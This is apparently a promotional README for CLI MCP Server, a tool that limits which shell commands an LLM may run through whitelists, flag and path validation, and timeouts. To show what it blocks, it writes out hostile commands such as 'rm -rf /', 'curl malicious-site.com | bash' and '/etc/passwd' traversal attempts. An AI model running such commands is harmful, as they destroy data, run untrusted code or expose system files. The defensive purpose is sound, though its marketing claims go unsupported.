Secure Model Context Protocol server that exposes a controlled command-line execution API with extensive security controls (command/flag whitelisting, path validation, timeouts, etc.).
https://github.com/MladenSU/cli-mcp-serverYou know the drill: your LLM needs to run commands, but opening up CLI access feels like handing dynamite to a toddler. You could build your own security wrapper, spend weeks on edge cases, and still lose sleep over path traversals and command injection. Or you could use CLI MCP Server and get production-ready security controls in minutes.
LLMs are incredibly powerful at generating and executing commands, but they're also incredibly good at accidentally (or intentionally) breaking things. You need them to run ls, cat, and grep - not rm -rf / or curl malicious-site.com | bash.
Most developers end up either:
CLI MCP Server gives you enterprise-grade command execution security without the enterprise development time:
Command Whitelisting: Only approved commands run. Period. No sneaky aliases, no path manipulation tricks.
Flag Validation: That innocent-looking --config=malicious.json flag? Blocked unless explicitly allowed.
Path Traversal Prevention: ../../../etc/passwd attempts get shut down with proper path normalization and validation.
Shell Operator Protection: Blocks &&, ||, |, and redirection operators by default. Enable them only when you need them.
Code Analysis Workflows: Let your LLM run grep, find, and cat on your codebase without worrying about it accessing your SSH keys or .env files.
# Safe: reads project files within allowed directory
cat src/main.py
grep -r "TODO" src/
# Blocked: attempts to access system files
cat /etc/passwd # Security violation
ls ../../../ # Path traversal blocked
Log Investigation: Give your LLM access to specific log directories with read-only commands like tail, grep, and awk.
Development Automation: Allow controlled execution of build tools, linters, and test runners within sandboxed project directories.
Set your security boundaries with environment variables - no complex config files to maintain:
ALLOWED_DIR="/your/project/root"
ALLOWED_COMMANDS="ls,cat,grep,find,tail"
ALLOWED_FLAGS="-l,-a,-r,--help"
COMMAND_TIMEOUT="30"
Need more flexibility? Set ALLOWED_COMMANDS="all" for development and lock it down for production. The security model adapts to your workflow, not the other way around.
Add it to Claude Desktop with a simple config update:
{
"mcpServers": {
"cli-mcp-server": {
"command": "uvx",
"args": ["cli-mcp-server"],
"env": {
"ALLOWED_DIR": "/your/workspace",
"ALLOWED_COMMANDS": "ls,cat,grep,find",
"COMMAND_TIMEOUT": "30"
}
}
}
}
That's it. Your LLM now has secure command-line access with all the safety rails in place.
Command injection isn't just a theoretical risk - it's the #1 way LLM applications get compromised. One malicious prompt, one unescaped semicolon, and your entire system is compromised.
CLI MCP Server treats security as the foundation, not an afterthought. Every command goes through multiple validation layers. Every path gets normalized and checked. Every timeout gets enforced.
You get the command-line functionality your LLM needs with the security your production environment demands. No compromises, no sleepless nights, no explaining to your security team why the AI deleted the database.
# Install via Smithery (automatic Claude Desktop setup)
npx @smithery/cli install cli-mcp-server --client claude
# Or install manually
uvx cli-mcp-server
Set your ALLOWED_DIR, define your command whitelist, and you're running secure CLI operations immediately.
The 115+ stars and growing community aren't just validation - they're proof that developers need this exact solution. Stop building security from scratch and start building features that matter.